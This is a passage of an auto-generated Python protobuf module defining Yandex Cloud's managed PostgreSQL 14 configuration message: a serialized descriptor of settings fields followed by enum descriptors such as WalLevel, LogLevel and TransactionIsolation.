\x01(\x0e\x32\x43.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.XmlOption\x12;\n\x16gin_pending_list_limit\x18\x37 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x35\n\x10\x64\x65\x61\x64lock_timeout\x18\x38 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19max_locks_per_transaction\x18\x39 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x43\n\x1emax_pred_locks_per_transaction\x18: \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12/\n\x0b\x61rray_nulls\x18; \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x61\n\x0f\x62\x61\x63kslash_quote\x18< \x01(\x0e\x32H.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.BackslashQuote\x12\x35\n\x11\x64\x65\x66\x61ult_with_oids\x18= \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15\x65scape_string_warning\x18> \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14lo_compat_privileges\x18? \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15quote_all_identifiers\x18\x41 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x1bstandard_conforming_strings\x18\x42 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14synchronize_seqscans\x18\x43 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x39\n\x15transform_null_equals\x18\x44 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x31\n\rexit_on_error\x18\x45 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\rseq_page_cost\x18\x46 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x36\n\x10random_page_cost\x18G \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12\x45\n\x16\x61utovacuum_max_workers\x18H \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x08\xfa\xc7\x31\x04\x31-32\x12M\n\x1c\x61utovacuum_vacuum_cost_delay\x18I \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06-1-100\x12O\n\x1c\x61utovacuum_vacuum_cost_limit\x18J \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0c\xfa\xc7\x31\x08-1-10000\x12J\n\x12\x61utovacuum_naptime\x18K \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r1000-86400000\x12H\n\x0f\x61rchive_timeout\x18L \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x31\x30\x30\x30\x30-86400000\x12N\n\x19track_activity_query_size\x18M \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0e\xfa\xc7\x31\n100-102400\x12\x35\n\x11\x65nable_bitmapscan\x18P \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_hashagg\x18Q \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_hashjoin\x18R \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_indexscan\x18S \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14\x65nable_indexonlyscan\x18T \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_material\x18U \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x34\n\x10\x65nable_mergejoin\x18V \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0f\x65nable_nestloop\x18W \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_seqscan\x18X \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12/\n\x0b\x65nable_sort\x18Y \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x32\n\x0e\x65nable_tidscan\x18Z \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x45\n\x14max_worker_processes\x18[ \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12\x45\n\x14max_parallel_workers\x18\\ \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12P\n\x1fmax_parallel_workers_per_gather\x18] \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1024\x12Q\n\x1e\x61utovacuum_vacuum_scale_factor\x18^ \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12R\n\x1f\x61utovacuum_analyze_scale_factor\x18_ \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12\x41\n\x1d\x64\x65\x66\x61ult_transaction_read_only\x18` \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x10\n\x08timezone\x18\x61 \x01(\t\x12:\n\x16\x65nable_parallel_append\x18\x62 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x38\n\x14\x65nable_parallel_hash\x18\x63 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12<\n\x18\x65nable_partition_pruning\x18\x64 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x42\n\x1e\x65nable_partitionwise_aggregate\x18\x65 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12=\n\x19\x65nable_partitionwise_join\x18\x66 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\'\n\x03jit\x18g \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12N\n max_parallel_maintenance_workers\x18h \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x07\xfa\xc7\x31\x03>=0\x12\x41\n\x1dparallel_leader_participation\x18i \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12N\n\x1blog_transaction_sample_rate\x18k \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12`\n\x0fplan_cache_mode\x18l \x01(\x0e\x32G.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PlanCacheMode\x12I\n\x18\x65\x66\x66\x65\x63tive_io_concurrency\x18m \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1000\x12M\n\x14\x65\x66\x66\x65\x63tive_cache_size\x18n \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x12\xfa\xc7\x31\x0e\x30-549755813888\x12r\n\x18shared_preload_libraries\x18o \x03(\x0e\x32P.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SharedPreloadLibraries\x12U\n\x1d\x61uto_explain_log_min_duration\x18p \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12<\n\x18\x61uto_explain_log_analyze\x18q \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12<\n\x18\x61uto_explain_log_buffers\x18r \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12;\n\x17\x61uto_explain_log_timing\x18s \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12=\n\x19\x61uto_explain_log_triggers\x18t \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12<\n\x18\x61uto_explain_log_verbose\x18u \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x46\n\"auto_explain_log_nested_statements\x18v \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12K\n\x18\x61uto_explain_sample_rate\x18w \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12<\n\x18pg_hint_plan_enable_hint\x18x \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x42\n\x1epg_hint_plan_enable_hint_table\x18y \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12p\n\x18pg_hint_plan_debug_print\x18z \x01(\x0e\x32N.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.PgHintPlanDebugPrint\x12\x66\n\x1apg_hint_plan_message_level\x18{ \x01(\x0e\x32\x42.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel\x12I\n\x13hash_mem_multiplier\x18| \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0e\xfa\xc7\x31\n0.0-1000.0\x12W\n\x19logical_decoding_work_mem\x18~ \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x17\xfa\xc7\x31\x13\x36\x35\x35\x33\x36-1099511627776\x12K\n\x1amaintenance_io_concurrency\x18\x7f \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-1000\x12U\n\x16max_slot_wal_keep_size\x18\x80\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x17\xfa\xc7\x31\x13-1-2251799812636672\x12L\n\rwal_keep_size\x18\x81\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x17\xfa\xc7\x31\x13-1-2251799812636672\x12<\n\x17\x65nable_incremental_sort\x18\x82\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12[\n\"autovacuum_vacuum_insert_threshold\x18\x83\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12[\n%autovacuum_vacuum_insert_scale_factor\x18\x84\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\r\xfa\xc7\x31\t0.0-100.0\x12P\n\x17log_min_duration_sample\x18\x85\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12M\n\x19log_statement_sample_rate\x18\x86\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValueB\x0b\xfa\xc7\x31\x07\x30.0-1.0\x12Q\n\x18log_parameter_max_length\x18\x87\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12Z\n!log_parameter_max_length_on_error\x18\x88\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12Y\n client_connection_check_interval\x18\x89\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12\x38\n\x13\x65nable_async_append\x18\x8a\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x37\n\x12\x65nable_gathermerge\x18\x8b\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x33\n\x0e\x65nable_memoize\x18\x8c\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12@\n\x1blog_recovery_conflict_waits\x18\x8d\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12L\n\x13vacuum_failsafe_age\x18\x8e\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12V\n\x1dvacuum_multixact_failsafe_age\x18\x8f\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x11\xfa\xc7\x31\r-1-2147483647\x12\x39\n\x14pg_qualstats_enabled\x18\x90\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x41\n\x1cpg_qualstats_track_constants\x18\x91\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12\x36\n\x10pg_qualstats_max\x18\x92\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12>\n\x19pg_qualstats_resolve_oids\x18\x93\x01 \x01(\x0b\x32\x1a.google.protobuf.BoolValue\x12?\n\x18pg_qualstats_sample_rate\x18\x94\x01 \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\"S\n\x08WalLevel\x12\x19\n\x15WAL_LEVEL_UNSPECIFIED\x10\x00\x12\x15\n\x11WAL_LEVEL_REPLICA\x10\x01\x12\x15\n\x11WAL_LEVEL_LOGICAL\x10\x02\"\xd6\x01\n\x11SynchronousCommit\x12\"\n\x1eSYNCHRONOUS_COMMIT_UNSPECIFIED\x10\x00\x12\x19\n\x15SYNCHRONOUS_COMMIT_ON\x10\x01\x12\x1a\n\x16SYNCHRONOUS_COMMIT_OFF\x10\x02\x12\x1c\n\x18SYNCHRONOUS_COMMIT_LOCAL\x10\x03\x12#\n\x1fSYNCHRONOUS_COMMIT_REMOTE_WRITE\x10\x04\x12#\n\x1fSYNCHRONOUS_COMMIT_REMOTE_APPLY\x10\x05\"\x9a\x01\n\x13\x43onstraintExclusion\x12$\n CONSTRAINT_EXCLUSION_UNSPECIFIED\x10\x00\x12\x1b\n\x17\x43ONSTRAINT_EXCLUSION_ON\x10\x01\x12\x1c\n\x18\x43ONSTRAINT_EXCLUSION_OFF\x10\x02\x12\"\n\x1e\x43ONSTRAINT_EXCLUSION_PARTITION\x10\x03\"\x92\x01\n\x11\x46orceParallelMode\x12#\n\x1f\x46ORCE_PARALLEL_MODE_UNSPECIFIED\x10\x00\x12\x1a\n\x16\x46ORCE_PARALLEL_MODE_ON\x10\x01\x12\x1b\n\x17\x46ORCE_PARALLEL_MODE_OFF\x10\x02\x12\x1f\n\x1b\x46ORCE_PARALLEL_MODE_REGRESS\x10\x03\"\x92\x02\n\x08LogLevel\x12\x19\n\x15LOG_LEVEL_UNSPECIFIED\x10\x00\x12\x14\n\x10LOG_LEVEL_DEBUG5\x10\x01\x12\x14\n\x10LOG_LEVEL_DEBUG4\x10\x02\x12\x14\n\x10LOG_LEVEL_DEBUG3\x10\x03\x12\x14\n\x10LOG_LEVEL_DEBUG2\x10\x04\x12\x14\n\x10LOG_LEVEL_DEBUG1\x10\x05\x12\x11\n\rLOG_LEVEL_LOG\x10\x06\x12\x14\n\x10LOG_LEVEL_NOTICE\x10\x07\x12\x15\n\x11LOG_LEVEL_WARNING\x10\x08\x12\x13\n\x0fLOG_LEVEL_ERROR\x10\t\x12\x13\n\x0fLOG_LEVEL_FATAL\x10\n\x12\x13\n\x0fLOG_LEVEL_PANIC\x10\x0b\"\x99\x01\n\x11LogErrorVerbosity\x12#\n\x1fLOG_ERROR_VERBOSITY_UNSPECIFIED\x10\x00\x12\x1d\n\x19LOG_ERROR_VERBOSITY_TERSE\x10\x01\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_DEFAULT\x10\x02\x12\x1f\n\x1bLOG_ERROR_VERBOSITY_VERBOSE\x10\x03\"\x8a\x01\n\x0cLogStatement\x12\x1d\n\x19LOG_STATEMENT_UNSPECIFIED\x10\x00\x12\x16\n\x12LOG_STATEMENT_NONE\x10\x01\x12\x15\n\x11LOG_STATEMENT_DDL\x10\x02\x12\x15\n\x11LOG_STATEMENT_MOD\x10\x03\x12\x15\n\x11LOG_STATEMENT_ALL\x10\x04\"\xe6\x01\n\x14TransactionIsolation\x12%\n!TRANSACTION_ISOLATION_UNSPECIFIED\x10\x00\x12*\n&TRANSACTION_ISOLATION_READ_UNCOMMITTED\x10\x01\x12(\n$TRANSACTION_ISOLATION_READ_COMMITTED\x10\x02\x12)\n%TRANSACTION_ISOLATION_REPEATABLE_READ\x10\x03\x12&\n\"TRANSACTION_ISOLATION_SERIALIZABLE\x10\x04\"[\n\x0b\x42yteaOutput\x12\x1c\n\x18\x42YTEA_OUTPUT_UNSPECIFIED\x10\x00\x12\x14\n\x10\x42YTEA_OUTPUT_HEX\x10\x01\x12\x18\n\x14\x42YTEA_OUTPUT_ESCAPED\x10\x02\"R\n\tXmlBinary\x12\x1a\n\x16XML_BINARY_UNSPECIFIED\x10\x00\x12\x15\n\x11XML_BINARY_BASE64\x10\x01\x12\x12\n\x0eXML_BINARY_HEX\x10\x02\"X\n\tXmlOption\x12\x1a\n\x16XML_OPTION_UNSPECIFIED\x10\x00\x12\x17\n\x13XML_OPTION_DOCUMENT\x10\x01\x12\x16\n\x12XML_OPTION_CONTENT\x10\x02\"\x9a\x01\n\x0e\x42\x61\x63kslashQuote\x12\x1f\n\x1b\x42\x41\x43KSLASH_QUOTE_UNSPECIFIED\x10\x00\x12\x13\n\x0f\x42\x41\x43KSLASH_QUOTE\x10\x01\x12\x16\n\x12\x42\x41\x43KSLASH_QUOTE_ON\x10\x02\x12\x17\n\x13\x42\x41\x43KSLASH_QUOTE_OFF\x10\x03\x12!\n\x1d\x42\x41\x43KSLASH_QUOTE_SAFE_ENCODING\x10\x04\"\x99\x01\n\rPlanCacheMode\x12\x1f\n\x1bPLAN_CACHE_MODE_UNSPECIFIED\x10\x00\x12\x18\n\x14PLAN_CACHE_MODE_AUTO\x10\x01\x12%\n!PLAN_CACHE_MODE_FORCE_CUSTOM_PLAN\x10\x02\x12&\n\"PLAN_CACHE_MODE_FORCE_GENERIC_PLAN\x10\x03\"\xd0\x01\n\x14PgHintPlanDebugPrint\x12(\n$PG_HINT_PLAN_DEBUG_PRINT_UNSPECIFIED\x10\x00\x12 \n\x1cPG_HINT_PLAN_DEBUG_PRINT_OFF\x10\x01\x12\x1f\n\x1bPG_HINT_PLAN_DEBUG_PRINT_ON\x10\x02\x12%\n!PG_HINT_PLAN_DEBUG_PRINT_DETAILED\x10\x03\x12$\n PG_HINT_PLAN_DEBUG_PRINT_VERBOSE\x10\x04\"\xed\x01\n\x16SharedPreloadLibraries\x12(\n$SHARED_PRELOAD_LIBRARIES_UNSPECIFIED\x10\x00\x12)\n%SHARED_PRELOAD_LIBRARIES_AUTO_EXPLAIN\x10\x01\x12)\n%SHARED_PRELOAD_LIBRARIES_PG_HINT_PLAN\x10\x02\x12(\n$SHARED_PRELOAD_LIBRARIES_TIMESCALEDB\x10\x03\x12)\n%SHARED_PRELOAD_LIBRARIES_PG_QUALSTATS\x10\x04\"\x8f\x02\n\x15PostgresqlConfigSet14\x12S\n\x10\x65\x66\x66\x65\x63tive_config\x18\x01 \x01(\x0b\x32\x39.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14\x12N\n\x0buser_config\x18\x02 \x01(\x0b\x32\x39.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14\x12Q\n\x0e\x64\x65\x66\x61ult_config\x18\x03 \x01(\x0b\x32\x39.yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14B\x81\x01\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresqlb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_wrappers__pb2.DESCRIPTOR,yandex_dot_cloud_dot_validation__pb2.DESCRIPTOR,])
_POSTGRESQLCONFIG14_WALLEVEL = _descriptor.EnumDescriptor(
name='WalLevel',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.WalLevel',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='WAL_LEVEL_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='WAL_LEVEL_REPLICA', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='WAL_LEVEL_LOGICAL', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10036,
serialized_end=10119,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_WALLEVEL)
_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT = _descriptor.EnumDescriptor(
name='SynchronousCommit',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.SynchronousCommit',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='SYNCHRONOUS_COMMIT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SYNCHRONOUS_COMMIT_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SYNCHRONOUS_COMMIT_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SYNCHRONOUS_COMMIT_LOCAL', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SYNCHRONOUS_COMMIT_REMOTE_WRITE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='SYNCHRONOUS_COMMIT_REMOTE_APPLY', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10122,
serialized_end=10336,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_SYNCHRONOUSCOMMIT)
_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION = _descriptor.EnumDescriptor(
name='ConstraintExclusion',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ConstraintExclusion',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='CONSTRAINT_EXCLUSION_PARTITION', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10339,
serialized_end=10493,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_CONSTRAINTEXCLUSION)
_POSTGRESQLCONFIG14_FORCEPARALLELMODE = _descriptor.EnumDescriptor(
name='ForceParallelMode',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ForceParallelMode',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_ON', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_OFF', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='FORCE_PARALLEL_MODE_REGRESS', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10496,
serialized_end=10642,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_FORCEPARALLELMODE)
_POSTGRESQLCONFIG14_LOGLEVEL = _descriptor.EnumDescriptor(
name='LogLevel',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogLevel',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG5', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG4', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG3', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG2', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_DEBUG1', index=5, number=5,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_LOG', index=6, number=6,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_NOTICE', index=7, number=7,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_WARNING', index=8, number=8,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_ERROR', index=9, number=9,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_FATAL', index=10, number=10,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_LEVEL_PANIC', index=11, number=11,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10645,
serialized_end=10919,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_LOGLEVEL)
_POSTGRESQLCONFIG14_LOGERRORVERBOSITY = _descriptor.EnumDescriptor(
name='LogErrorVerbosity',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogErrorVerbosity',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_TERSE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_DEFAULT', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_ERROR_VERBOSITY_VERBOSE', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=10922,
serialized_end=11075,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_LOGERRORVERBOSITY)
_POSTGRESQLCONFIG14_LOGSTATEMENT = _descriptor.EnumDescriptor(
name='LogStatement',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.LogStatement',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_NONE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_DDL', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_MOD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='LOG_STATEMENT_ALL', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11078,
serialized_end=11216,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_LOGSTATEMENT)
_POSTGRESQLCONFIG14_TRANSACTIONISOLATION = _descriptor.EnumDescriptor(
name='TransactionIsolation',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.TransactionIsolation',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_READ_UNCOMMITTED', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_READ_COMMITTED', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_REPEATABLE_READ', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='TRANSACTION_ISOLATION_SERIALIZABLE', index=4, number=4,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=11219,
serialized_end=11449,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_TRANSACTIONISOLATION)
_POSTGRESQLCONFIG14_BYTEAOUTPUT = _descriptor.EnumDescriptor(
name='ByteaOutput',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.ByteaOutput',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='BYTEA_OUTPUT_UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
